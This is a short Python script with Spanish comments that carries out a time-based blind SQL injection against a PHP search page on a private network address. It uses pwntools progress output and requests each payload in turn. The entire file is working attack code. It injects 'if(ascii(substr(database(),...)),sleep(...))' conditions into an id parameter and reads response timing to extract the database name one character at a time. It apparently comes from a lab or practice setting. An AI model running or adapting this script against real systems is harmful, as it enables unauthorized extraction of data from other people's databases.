#!/usr/bin/env python
"""
Este script realiza una inyección SQL de tipo Time-Based Blind SQL Injection
"""
import requests
import signal
import sys
import time
import string

from pwn import *


def signal_handler(signal, frame):
    """
    Salir con Ctrl+C
    """
    print('Saliendo con Ctrl+C!')
    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)


# Variables globales
main_url = "http://192.168.1.121/searchUsers2.php"
characters = string.printable


def makeSQLI():

    p1 = log.progress("Fuerza bruta")
    p1.status("Fuerza bruta en proceso")

    time.sleep(2)

    p2 = log.progress(f"Datos extraídos")

    extracted_info = ""

    for position in range(1, 10):

        for character in range(33, 126):

            sqli_url = main_url + \
                "?id=1 and if(ascii(substr(database(),%d,1))=%d,sleep(0.35),1)" % (
                    position, character)

            p1.status(
                f"\n[i] Probando posición {position} el carácter: {chr(character)}")

            time_start = time.time()

            r = requests.get(sqli_url)

            time_end = time.time()

            if time_end - time_start > 0.35:
                extracted_info += chr(character)
                p2.status(extracted_info)
                break


if __name__ == "__main__":
    makeSQLI()